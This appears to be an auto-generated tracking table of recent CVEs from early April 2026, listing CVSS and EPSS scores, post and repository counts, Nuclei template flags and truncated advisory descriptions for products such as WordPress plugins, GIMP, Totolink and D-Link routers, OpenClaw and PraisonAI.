## Updated at UTC 2026-04-11T15:31:13.081971

| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-5809 | 7.1 | 0.03% | 2 | 0 | | 2026-04-11T08:16:05.503000 | The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion i |
| CVE-2026-34621 | 9.6 | 0.24% | 4 | 0 | | 2026-04-11T07:16:03.633000 | Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by a |
| CVE-2026-4152 | 7.8 | 0.06% | 2 | 0 | | 2026-04-11T03:30:41 | GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerabi |
| CVE-2026-4151 | 7.8 | 0.06% | 2 | 0 | | 2026-04-11T03:30:41 | GIMP ANI File Parsing Integer Overflow Remote Code Execution Vulnerability. This |
| CVE-2026-4150 | 7.8 | 0.06% | 2 | 0 | | 2026-04-11T03:30:41 | GIMP PSD File Parsing Integer Overflow Remote Code Execution Vulnerability. This |
| CVE-2026-4157 | 7.5 | 0.19% | 2 | 0 | | 2026-04-11T03:30:41 | ChargePoint Home Flex revssh Service Command Injection Remote Code Execution Vul |
| CVE-2026-4156 | 7.5 | 0.07% | 2 | 0 | | 2026-04-11T03:30:41 | ChargePoint Home Flex OCPP getpreq Stack-based Buffer Overflow Remote Code Execu |
| CVE-2026-4155 | 7.5 | 0.24% | 2 | 0 | | 2026-04-11T03:30:41 | ChargePoint Home Flex Inclusion of Sensitive Information in Source Code Informat |
| CVE-2026-5494 | 7.8 | 0.05% | 4 | 0 | | 2026-04-11T03:30:41 | Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Cod |
| CVE-2026-5059 | 9.8 | 1.01% | 4 | 0 | | 2026-04-11T03:30:41 | aws-mcp-server AWS CLI Command Injection Remote Code Execution Vulnerability. Th |
| CVE-2026-5495 | 7.8 | 0.05% | 2 | 0 | | 2026-04-11T03:30:41 | Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Cod |
| CVE-2026-5493 | 7.8 | 0.05% | 2 | 0 | | 2026-04-11T03:30:41 | Labcenter Electronics Proteus PDSPRJ File Parsing Out-Of-Bounds Write Remote Cod |
| CVE-2026-5058 | 9.8 | 1.01% | 2 | 0 | | 2026-04-11T03:30:41 | aws-mcp-server Command Injection Remote Code Execution Vulnerability. This vulne |
| CVE-2026-5144 | 8.8 | 0.05% | 2 | 0 | | 2026-04-11T03:30:41 | The BuddyPress Groupblog plugin for WordPress is vulnerable to Privilege Escalat |
| CVE-2026-5496 | 7.8 | 0.05% | 4 | 0 | | 2026-04-11T01:16:18.830000 | Labcenter Electronics Proteus PDSPRJ File Parsing Type Confusion Remote Code Exe |
| CVE-2026-5055 | 7.8 | 0.01% | 2 | 0 | | 2026-04-11T01:16:18.017000 | NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerabil |
| CVE-2026-5054 | 7.8 | 0.01% | 2 | 0 | | 2026-04-11T01:16:17.890000 | NoMachine External Control of File Path Local Privilege Escalation Vulnerability |
| CVE-2026-4154 | 7.8 | 0.06% | 2 | 0 | | 2026-04-11T01:16:17.093000 | GIMP XPM File Parsing Integer Overflow Remote Code Execution Vulnerability. This |
| CVE-2026-4153 | 7.8 | 0.06% | 2 | 0 | | 2026-04-11T01:16:16.963000 | GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerabi |
| CVE-2026-4149 | 10.0 | 1.27% | 6 | 0 | | 2026-04-11T01:16:16.430000 | Sonos Era 300 SMB Response Out-Of-Bounds Access Remote Code Execution Vulnerabil |
| CVE-2026-40188 | 7.7 | 0.03% | 2 | 0 | | 2026-04-10T21:37:28 | ### Summary The SFTP command rename sanitizes only the source path and not the d |
| CVE-2026-5483 | 8.6 | 0.06% | 2 | 0 | | 2026-04-10T21:31:15 | A flaw was found in odh-dashboard in Red Hat Openshift AI. This vulnerability in |
| CVE-2026-6057 | 9.8 | 0.13% | 1 | 0 | | 2026-04-10T21:16:28.800000 | FalkorDB Browser 1.9.3 contains an unauthenticated path traversal vulnerability |
| CVE-2026-40189 | 0 | 0.10% | 4 | 0 | | 2026-04-10T20:16:23.890000 | goshs is a SimpleHTTPServer written in Go. Prior to 2.0.0-beta.4, goshs enforces |
| CVE-2026-40175 | 10.0 | 0.24% | 2 | 0 | | 2026-04-10T20:16:22.800000 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15. |
| CVE-2026-40093 | 9.1 | 0.06% | 1 | 0 | | 2026-04-10T19:55:04 | ### Impact Block timestamp validation enforces that `timestamp >= parent.timest |
| CVE-2026-35641 | 8.6 | 0.01% | 2 | 0 | | 2026-04-10T19:45:22 | > Fixed in OpenClaw 2026.3.24, the current shipping release. ### Summary During |
| CVE-2026-35643 | 8.8 | 0.04% | 4 | 0 | | 2026-04-10T19:38:05 | ## Summary Android Canvas WebView pages from untrusted origins could invoke the |
| CVE-2026-35666 | 8.8 | 0.04% | 2 | 0 | | 2026-04-10T19:37:45 | ## Summary Allow-always exec approvals did not unwrap /usr/bin/time, so an unreg |
| CVE-2026-35595 | 8.3 | 0.03% | 2 | 0 | | 2026-04-10T19:36:16 | ## Summary A user with Write-level access to a project can escalate their permi |
| CVE-2026-40163 | 8.2 | 0.08% | 2 | 0 | | 2026-04-10T19:30:28 | ### Summary Two unauthenticated path traversal vulnerabilities exist in Saltcor |
| CVE-2026-40156 | 7.8 | 0.02% | 2 | 0 | | 2026-04-10T19:26:45 | PraisonAI automatically loads a file named `tools.py` from the current working d |
| CVE-2026-40158 | 8.6 | 0.03% | 4 | 0 | | 2026-04-10T19:25:40 | PraisonAI's AST-based Python sandbox can be bypassed using `type.__getattribute_ |
| CVE-2026-40150 | 7.7 | 0.03% | 1 | 0 | | 2026-04-10T19:23:58 | ## Summary The `web_crawl()` function in `praisonaiagents/tools/web_crawl_tools |
| CVE-2026-40116 | 7.5 | 0.03% | 1 | 0 | | 2026-04-10T19:22:52 | ## Summary The `/media-stream` WebSocket endpoint in PraisonAI's call module ac |
| CVE-2026-40113 | 8.4 | 0.02% | 1 | 0 | | 2026-04-10T19:22:37 | **Summary** deploy.py constructs a single comma-delimited string for the gcloud |
| CVE-2026-34179 | 9.1 | 0.09% | 1 | 0 | | 2026-04-10T19:20:52 | ### Summary A restricted TLS certificate user can escalate to cluster admin by |
| CVE-2026-33707 | 9.4 | 0.07% | 4 | 0 | | 2026-04-10T19:16:23.950000 | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, th |
| CVE-2026-40200 | 8.2 | 0.01% | 4 | 0 | | 2026-04-10T18:31:28 | An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory co |
| CVE-2026-32931 | 7.5 | 0.16% | 2 | 0 | | 2026-04-10T18:16:42.430000 | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an |
| CVE-2026-31941 | 7.7 | 0.03% | 2 | 0 | | 2026-04-10T18:16:41.640000 | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Ch |
| CVE-2026-35663 | None | 0.04% | 2 | 0 | | 2026-04-10T17:28:09 | ## Summary Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim |
| CVE-2026-35660 | None | 0.04% | 2 | 0 | | 2026-04-10T17:27:04 | ## Summary Before `v2026.3.23`, the Gateway `agent` RPC accepted `/reset` and `/ |
| CVE-2026-35653 | 8.1 | 0.04% | 2 | 0 | | 2026-04-10T17:24:51 | > Fixed in OpenClaw 2026.3.24, the current shipping release. # Title `browser. |
| CVE-2026-40157 | 0 | 0.07% | 2 | 0 | | 2026-04-10T17:17:13.457000 | PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the rec |
| CVE-2026-35669 | 8.8 | 0.04% | 2 | 0 | | 2026-04-10T17:17:09.240000 | OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gatew |
| CVE-2026-35668 | 7.7 | 0.05% | 4 | 0 | | 2026-04-10T17:17:09.060000 | OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enf |
| CVE-2026-35650 | 7.5 | 0.06% | 2 | 0 | | 2026-04-10T17:17:05.627000 | OpenClaw before 2026.3.22 contains an environment variable override handling vul |
| CVE-2026-6067 | 7.5 | 0.06% | 2 | 0 | | 2026-04-10T16:16:36.437000 | A heap buffer overflow vulnerability exists in the Netwide Assembler (NASM) due |
| CVE-2025-58913 | 8.1 | 0.11% | 2 | 0 | | 2026-04-10T15:32:07 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP |
| CVE-2026-40217 | 8.8 | 0.19% | 2 | 0 | | 2026-04-10T15:32:07 | LiteLLM through 2026-04-08 allows remote attackers to execute arbitrary code via |
| CVE-2026-33092 | 7.8 | 0.01% | 2 | 0 | | 2026-04-10T15:32:05 | Local privilege escalation due to improper handling of environment variables. Th |
| CVE-2026-40088 | 9.7 | 0.05% | 1 | 0 | | 2026-04-10T14:41:51 | The `execute_command` function and workflow shell execution are exposed to user- |
| CVE-2025-5804 | 7.5 | 0.07% | 2 | 0 | | 2026-04-10T14:16:25.450000 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP |
| CVE-2026-5412 | 9.9 | 0.04% | 2 | 0 | | 2026-04-10T13:16:45.780000 | In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in th |
| CVE-2026-1115 | 9.6 | 0.04% | 1 | 0 | | 2026-04-10T13:16:43.970000 | A Stored Cross-Site Scripting (XSS) vulnerability was identified in the social f |
| CVE-2026-6029 | 9.8 | 0.89% | 1 | 0 | | 2026-04-10T09:31:21 | A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The affec |
| CVE-2026-6025 | 9.8 | 0.89% | 1 | 0 | | 2026-04-10T06:31:49 | A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This af |
| CVE-2026-6016 | 8.8 | 0.05% | 1 | 0 | | 2026-04-10T06:31:44 | A vulnerability was found in Tenda AC9 15.03.02.13. The affected element is the |
| CVE-2026-6014 | 8.8 | 0.04% | 1 | 0 | | 2026-04-10T06:31:44 | A flaw has been found in D-Link DIR-513 1.10. This issue affects the function fo |
| CVE-2026-6013 | 8.8 | 0.04% | 1 | 0 | | 2026-04-10T06:31:44 | A vulnerability was detected in D-Link DIR-513 1.10. This vulnerability affects |
| CVE-2026-6015 | 8.8 | 0.05% | 1 | 0 | | 2026-04-10T06:16:06.510000 | A vulnerability has been found in Tenda AC9 15.03.02.13. Impacted is the functio |
| CVE-2026-6012 | 8.8 | 0.04% | 1 | 0 | | 2026-04-10T05:16:07.027000 | A security vulnerability has been detected in D-Link DIR-513 1.10. This affects |
| CVE-2026-5994 | 9.8 | 0.89% | 2 | 0 | | 2026-04-10T03:31:16 | A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. Th |
| CVE-2026-5996 | 9.8 | 0.89% | 2 | 0 | | 2026-04-10T03:31:16 | A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191 |
| CVE-2026-5993 | 9.8 | 0.89% | 1 | 0 | | 2026-04-10T03:31:16 | A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This vu |
| CVE-2026-25203 | 7.8 | 0.01% | 1 | 0 | | 2026-04-10T03:31:16 | Samsung MagicINFO 9 Server Incorrect Default Permissions Local Privilege Escalat |
| CVE-2026-4351 | 8.1 | 0.06% | 1 | 0 | | 2026-04-10T03:31:16 | The Perfmatters plugin for WordPress is vulnerable to arbitrary file overwrite v |
| CVE-2026-3360 | 7.5 | 0.10% | 1 | 0 | | 2026-04-10T03:31:16 | The Tutor LMS – eLearning and online course solution plugin for WordPress is vul |
| CVE-2026-5997 | 9.8 | 0.89% | 2 | 0 | | 2026-04-10T02:16:04.247000 | A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. The impac |
| CVE-2026-33170 | None | 0.01% | 2 | 0 | | 2026-04-10T01:59:00 | ### Impact `SafeBuffer#%` does not propagate the `@html_unsafe` flag to the newl |
| CVE-2026-5995 | 9.8 | 0.89% | 2 | 0 | | 2026-04-10T01:16:42.490000 | A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Impacte |
| CVE-2026-35638 | 8.8 | 0.04% | 1 | 0 | | 2026-04-10T00:30:38 | OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the C |
| CVE-2026-5983 | 8.8 | 0.04% | 1 | 0 | | 2026-04-10T00:30:38 | A vulnerability was determined in D-Link DIR-605L 2.13B01. This issue affects th |
| CVE-2026-5982 | 8.8 | 0.04% | 1 | 0 | | 2026-04-10T00:30:38 | A vulnerability was found in D-Link DIR-605L 2.13B01. This vulnerability affects |
| CVE-2026-5981 | 8.8 | 0.04% | 1 | 0 | | 2026-04-10T00:30:38 | A vulnerability has been found in D-Link DIR-605L 2.13B01. This affects the func |
| CVE-2026-5988 | 8.8 | 0.05% | 1 | 0 | | 2026-04-10T00:30:38 | A vulnerability was detected in Tenda F451 1.0.0.7. This impacts the function fo |
| CVE-2026-5992 | 8.8 | 0.05% | 1 | 0 | | 2026-04-10T00:30:38 | A vulnerability was determined in Tenda F451 1.0.0.7. This affects the function |
| CVE-2026-5991 | 8.8 | 0.05% | 1 | 0 | | 2026-04-10T00:30:38 | A vulnerability was found in Tenda F451 1.0.0.7. Affected by this issue is the f |
| CVE-2026-5989 | 8.8 | 0.05% | 1 | 0 | | 2026-04-10T00:30:38 | A flaw has been found in Tenda F451 1.0.0.7. Affected is the function fromRouteS |
| CVE-2026-33778 | 7.5 | 0.06% | 1 | 0 | | 2026-04-10T00:30:37 | An Improper Validation of Syntactic Correctness of Input vulnerability in the I |
| CVE-2026-33785 | 8.8 | 0.01% | 1 | 0 | | 2026-04-10T00:30:37 | A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on |
| CVE-2026-33790 | 7.5 | 0.04% | 1 | 0 | | 2026-04-10T00:30:37 | An Improper Check for Unusual or Exceptional Conditions vulnerability in the flo |
| CVE-2026-33793 | 7.8 | 0.01% | 1 | 0 | | 2026-04-10T00:30:37 | An Execution with Unnecessary Privileges vulnerability in the User Interface (UI |
| CVE-2026-35625 | 7.8 | 0.03% | 1 | 0 | | 2026-04-10T00:30:37 | OpenClaw before 2026.3.25 contains a privilege escalation vulnerability where si |
| CVE-2026-35645 | 8.1 | 0.03% | 1 | 0 | | 2026-04-10T00:30:37 | OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in the g |
| CVE-2026-33788 | 7.8 | 0.02% | 1 | 0 | | 2026-04-10T00:30:30 | A Missing Authentication for Critical Function vulnerability in the Flexible PIC |
| CVE-2026-5990 | 8.8 | 0.05% | 1 | 0 | | 2026-04-10T00:16:36.363000 | A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this vulnerabi |
| CVE-2026-34424 | 9.8 | 0.15% | 2 | 0 | | 2026-04-09T23:17:00.540000 | Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-st |
| CVE-2026-5984 | 8.8 | 0.02% | 1 | 0 | | 2026-04-09T22:16:37.873000 | A vulnerability was identified in D-Link DIR-605L 2.13B01. Impacted is the funct |
| CVE-2026-40154 | 9.3 | 0.03% | 2 | 0 | | 2026-04-09T22:16:36.503000 | PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI treats remo |
| CVE-2026-40149 | 7.9 | 0.01% | 1 | 0 | | 2026-04-09T22:16:35.750000 | PraisonAI is a multi-agent teams system. Prior to 4.5.128, the gateway's /api/ap |
| CVE-2026-35639 | 8.8 | 0.20% | 1 | 0 | | 2026-04-09T22:16:33.317000 | OpenClaw before 2026.3.22 contains a privilege escalation vulnerability in the d |
| CVE-2026-34512 | 8.1 | 0.03% | 1 | 0 | | 2026-04-09T22:16:29.757000 | OpenClaw before 2026.3.25 contains an improper access control vulnerability in t |
| CVE-2026-33784 | 9.8 | 0.04% | 1 | 0 | | 2026-04-09T22:16:27.820000 | A Use of Default Password vulnerability in the Juniper Networks Support Insigh |
| CVE-2025-13914 | 8.7 | 0.03% | 1 | 0 | | 2026-04-09T22:16:22.697000 | A Key Exchange without Entity Authentication vulnerability in the SSH implementa |
| CVE-2026-5978 | 9.8 | 0.89% | 1 | 0 | | 2026-04-09T21:31:37 | A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191 |
| CVE-2026-5977 | 9.8 | 0.89% | 1 | 0 | | 2026-04-09T21:31:37 | A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. This im |
| CVE-2026-5980 | 8.8 | 0.04% | 1 | 0 | | 2026-04-09T21:31:37 | A flaw has been found in D-Link DIR-605L 2.13B01. Affected by this issue is the |
| CVE-2026-5975 | 9.8 | 0.89% | 1 | 0 | | 2026-04-09T21:31:36 | A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. The imp |
| CVE-2026-5979 | 8.8 | 0.04% | 1 | 0 | | 2026-04-09T21:16:13.967000 | A vulnerability was detected in D-Link DIR-605L 2.13B01. Affected by this vulner |
| CVE-2026-5976 | 9.8 | 0.89% | 1 | 0 | | 2026-04-09T20:16:29.763000 | A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. Th |
| CVE-2026-39987 | 0 | 2.70% | 2 | 0 | template | 2026-04-09T18:17:02.807000 | marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE |
| CVE-2026-39885 | 7.5 | 0.03% | 1 | 0 | | 2026-04-09T14:29:54 | ## Summary The `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-pa |
| CVE-2026-39891 | 8.8 | 0.05% | 2 | 0 | | 2026-04-09T14:29:51 | ## Summary Direct insertion of unescaped user input into template-rendering tool |
| CVE-2026-39890 | 9.8 | 0.29% | 1 | 0 | | 2026-04-09T14:29:47 | ## Summary The `AgentService.loadAgentFromFile` method uses the `js-yaml` librar |
| CVE-2026-39889 | 7.5 | 0.04% | 2 | 0 | | 2026-04-09T14:29:17 | The A2U (Agent-to-User) event stream server in PraisonAI exposes all agent activ |
| CVE-2026-39429 | 8.2 | 0.07% | 1 | 0 | | 2026-04-09T14:28:53 | ### Summary The cache server is directly exposed by the root shard and has no a |
| CVE-2024-1490 | 7.2 | 0.08% | 1 | 0 | | 2026-04-09T12:31:22 | An authenticated remote attacker with high privileges can exploit the OpenVPN co |
| CVE-2026-5852 | 9.8 | 0.89% | 1 | 0 | | 2026-04-09T09:31:56 | A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affecte |
| CVE-2026-5854 | 9.8 | 0.23% | 1 | 0 | | 2026-04-09T09:31:56 | A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected |
| CVE-2026-5853 | 9.8 | 0.89% | 1 | 0 | | 2026-04-09T07:16:05.273000 | A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191 |
| CVE-2026-5850 | 9.8 | 0.89% | 2 | 0 | | 2026-04-09T06:30:36 | A vulnerability was identified in Totolink A7100RU 7.4cu.2313_b20191024. This af |
| CVE-2026-5851 | 9.8 | 0.89% | 2 | 0 | | 2026-04-09T06:30:35 | A security flaw has been discovered in Totolink A7100RU 7.4cu.2313_b20191024. Th |
| CVE-2026-1830 | 9.8 | 0.18% | 2 | 0 | | 2026-04-09T06:30:35 | The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution |
| CVE-2026-5844 | 7.2 | 0.19% | 1 | 0 | | 2026-04-09T05:16:06.653000 | A vulnerability was found in D-Link DIR-882 1.01B02. Impacted is the function sp |
| CVE-2026-4326 | 8.8 | 0.08% | 1 | 0 | | 2026-04-09T03:31:24 | The Vertex Addons for Elementor plugin for WordPress is vulnerable to Missing Au |
| CVE-2026-5830 | 8.8 | 0.05% | 1 | 0 | | 2026-04-09T03:31:24 | A vulnerability was identified in Tenda AC15 15.03.05.18. This affects the funct |
| CVE-2026-5173 | 8.5 | 0.02% | 2 | 1 | | 2026-04-09T00:32:08 | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.9. |
| CVE-2026-5815 | 8.8 | 0.08% | 1 | 0 | | 2026-04-09T00:32:08 | A vulnerability was detected in D-Link DIR-645 1.01/1.02/1.03. Impacted is the f |
| CVE-2026-3199 | None | 0.07% | 1 | 0 | | 2026-04-09T00:32:08 | A vulnerability in the task management component of Sonatype Nexus Repository ve |
| CVE-2026-40031 | 7.8 | 0.01% | 2 | 0 | | 2026-04-09T00:32:07 | MemProcFS before 5.17 contains multiple unsafe library-loading patterns that ena |
| CVE-2026-40032 | 7.8 | 0.02% | 1 | 0 | | 2026-04-09T00:32:07 | UAC (Unix-like Artifacts Collector) before 3.3.0-rc1 contains a command injectio |
| CVE-2026-40029 | 7.8 | 0.02% | 1 | 0 | | 2026-04-09T00:32:07 | parseusbs before 1.9 contains an OS command injection vulnerability in parseUSBs |
| CVE-2026-40035 | 9.1 | 0.10% | 2 | 0 | | 2026-04-09T00:32:07 | Unfurl through 2025.08 contains an improper input validation vulnerability in co |
| CVE-2026-1092 | 7.5 | 0.02% | 1 | 0 | | 2026-04-09T00:32:01 | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 |
| CVE-2025-12664 | 7.5 | 0.02% | 1 | 0 | | 2026-04-08T23:16:56.200000 | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 |
| CVE-2026-5859 | 0 | 0.03% | 1 | 0 | | 2026-04-08T22:16:25.383000 | Integer overflow in WebML in Google Chrome prior to 147.0.7727.55 allowed a remo |
| CVE-2026-40036 | 7.5 | 0.10% | 1 | 0 | | 2026-04-08T22:16:24.190000 | Unfurl before 2026.04 contains an unbounded zlib decompression vulnerability in |
| CVE-2026-40030 | 7.8 | 0.02% | 1 | 0 | | 2026-04-08T22:16:23.483000 | parseusbs before 1.9 contains an OS command injection vulnerability where the vo |
| CVE-2026-1340 | 9.8 | 67.82% | 3 | 2 | | 2026-04-08T21:34:17 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve |
| CVE-2026-2942 | 9.8 | 0.13% | 1 | 0 | | 2026-04-08T21:33:41 | The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file u |
| CVE-2026-25776 | 9.8 | 0.05% | 1 | 0 | | 2026-04-08T21:26:35.910000 | Movable Type provided by Six Apart Ltd. contains a code injection vulnerability |
| CVE-2026-5208 | 8.2 | 0.05% | 1 | 0 | | 2026-04-08T21:26:13.410000 | Command injection in alerts in CoolerControl/coolercontrold <4.0.0 allows authen |
| CVE-2026-39394 | 8.1 | 0.02% | 1 | 0 | | 2026-04-08T21:26:13.410000 | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, mo |
| CVE-2026-33756 | 7.5 | 0.08% | 1 | 0 | | 2026-04-08T21:26:13.410000 | Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.5 |
| CVE-2026-35401 | 7.5 | 0.04% | 1 | 0 | | 2026-04-08T21:26:13.410000 | Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.5 |
| CVE-2026-23869 | 7.5 | 0.32% | 1 | 2 | | 2026-04-08T21:26:13.410000 | A denial of service vulnerability exists in React Server Components, affecting t |
| CVE-2026-5436 | 8.1 | 0.18% | 1 | 0 | | 2026-04-08T21:26:13.410000 | The MW WP Form plugin for WordPress is vulnerable to Arbitrary File Move/Read in |
| CVE-2026-39888 | 9.9 | 0.08% | 1 | 0 | | 2026-04-08T21:25:14.927000 | PraisonAI is a multi-agent teams system. Prior to 1.5.115, execute_code() in pra |
| CVE-2026-39393 | 8.1 | 0.01% | 1 | 0 | | 2026-04-08T19:15:59 | ## Summary The install route guard in ci4ms relies solely on a volatile cache c |
| CVE-2026-4338 | 7.5 | 0.04% | 1 | 0 | | 2026-04-08T18:35:58 | The ActivityPub WordPress plugin before 8.0.2 does not properly filter posts to |
| CVE-2026-33466 | 8.1 | 0.28% | 1 | 0 | | 2026-04-08T18:34:20 | Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash |
| CVE-2026-33461 | 7.7 | 0.06% | 1 | 0 | | 2026-04-08T18:34:08 | Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure v |
| CVE-2026-4498 | 7.7 | 0.05% | 1 | 0 | | 2026-04-08T18:34:08 | Execution with Unnecessary Privileges (CWE-250) in Kibana's Fleet plugin debug r |
| CVE-2026-27806 | 7.8 | 0.01% | 1 | 0 | | 2026-04-08T18:03:54 | ## Summary The Orbit agent's FileVault disk encryption key rotation flow on col |
| CVE-2026-28261 | 7.8 | 0.01% | 1 | 0 | | 2026-04-08T15:31:50 | Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, ver |
| CVE-2026-5301 | 7.6 | 0.02% | 1 | 0 | | 2026-04-08T15:31:50 | Stored XSS in log viewer in CoolerControl/coolercontrol-ui <4.0.0 allows unauthe |
| CVE-2026-3396 | 7.5 | 0.08% | 1 | 0 | | 2026-04-08T12:31:36 | WCAPF – WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL I |
| CVE-2026-3243 | 8.8 | 0.20% | 1 | 0 | | 2026-04-08T12:31:36 | The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary fil |
| CVE-2026-3535 | 9.8 | 0.28% | 1 | 0 | | 2026-04-08T09:31:42 | The DSGVO Google Web Fonts GDPR plugin for WordPress is vulnerable to arbitrary |
| CVE-2026-34197 | 8.8 | 5.60% | 1 | 6 | template | 2026-04-07T15:30:49 | Improper Input Validation, Improper Control of Generation of Code ('Code Injecti |
| CVE-2026-35616 | 9.8 | 25.25% | 1 | 5 | template | 2026-04-06T18:12:57.863000 | A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through |
| CVE-2026-34040 | 8.8 | 0.01% | 1 | 0 | | 2026-04-03T16:51:28.670000 | Moby is an open source container framework. Prior to version 29.3.1, a security |
| CVE-2026-34504 | 8.3 | 0.05% | 2 | 0 | | 2026-04-02T12:20:31.950000 | OpenClaw before 2026.3.28 contains a server-side request forgery vulnerability i |
| CVE-2026-21643 | 9.8 | 13.70% | 1 | 2 | template | 2026-03-30T13:16:22.063000 | An improper neutralization of special elements used in an sql command ('sql inje |
| CVE-2026-27654 | 8.2 | 0.03% | 2 | 1 | | 2026-03-24T15:30:36 | NGINX Open Source and NGINX Plus have a vulnerability in the ngx_http_dav_module |
| CVE-2026-32011 | 7.5 | 0.06% | 1 | 0 | | 2026-03-20T21:13:05 | ## Impact OpenClaw webhook handlers for BlueBubbles and Google Chat accepted an |
| CVE-2026-3497 | None | 0.03% | 1 | 0 | | 2026-03-18T21:34:00 | Vulnerability in the OpenSSH GSSAPI delta included in various Linux distribution |
| CVE-2026-23060 | 5.5 | 0.01% | 1 | 0 | | 2026-03-13T21:32:48 | In the Linux kernel, the following vulnerability has been resolved: crypto: aut |
| CVE-2026-20127 | 10.0 | 39.66% | 2 | 6 | | 2026-02-25T18:31:45 | A vulnerability in the peering authentication in Cisco Catalyst SD-WAN Controlle |
| CVE-2026-27486 | None | 0.04% | 1 | 0 | | 2026-02-23T22:28:51 | ## Summary OpenClaw CLI process cleanup used system-wide process enumeration an |
| CVE-2026-1281 | 9.8 | 71.80% | 1 | 2 | | 2026-01-30T00:31:29 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve |
| CVE-2026-22200 | 7.5 | 74.45% | 2 | 2 | template | 2026-01-27T21:31:40 | Enhancesoft osTicket versions up to and including 1.18.2 contain an arbitrary fi |
| CVE-2025-68161 | None | 0.03% | 1 | 0 | | 2025-12-19T22:08:03 | The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does |
| CVE-2025-6218 | 7.8 | 4.76% | 1 | 6 | | 2025-12-09T21:31:29 | RARLAB WinRAR Directory Traversal Remote Code Execution Vulnerability. This vuln |
| CVE-2025-55182 | 10.0 | 84.89% | 2 | 100 | template | 2025-12-09T16:53:25 | ### Impact There is an unauthenticated remote code execution vulnerability in R |
| CVE-2025-8088 | 8.8 | 7.05% | 1 | 32 | | 2025-10-22T00:34:26 | A path traversal vulnerability affecting the Windows version of WinRAR allows th |
| CVE-2024-27297 | 6.3 | 0.05% | 1 | 0 | | 2025-06-27T13:15:23.240000 | Nix is a package manager for Linux and other Unix systems. A fixed-output deriva |
| CVE-2024-34359 | 9.6 | 56.67% | 1 | 0 | | 2024-11-21T09:18:30.130000 | llama-cpp-python is the Python bindings for llama.cpp. `llama-cpp-python` depend |
| CVE-2020-8562 | 2.2 | 0.06% | 1 | 0 | | 2024-11-21T05:39:02.180000 | As mitigations to a report from 2019 and CVE-2020-8555, Kubernetes attempts to p |
| CVE-2026-32892 | 0 | 0.19% | 4 | 0 | | N/A | |
| CVE-2026-31940 | 0 | 0.04% | 2 | 0 | | N/A | |
| CVE-2026-31939 | 0 | 0.04% | 2 | 0 | | N/A | |
| CVE-2026-33618 | 0 | 0.05% | 2 | 0 | | N/A | |
| CVE-2026-33710 | 0 | 0.03% | 2 | 0 | | N/A | |
| CVE-2026-32252 | 0 | 0.02% | 2 | 0 | | N/A | |
| CVE-2026-33698 | 0 | 0.05% | 2 | 0 | | N/A | |
| CVE-2026-40168 | 0 | 0.04% | 2 | 0 | | N/A | |
| CVE-2026-40089 | 0 | 0.04% | 1 | 0 | | N/A | |
| CVE-2026-0234 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2026-0233 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2026-30461 | 0 | 0.00% | 1 | 0 | | N/A | |
| CVE-2026-34392 | 0 | 0.03% | 1 | 0 | | N/A | |
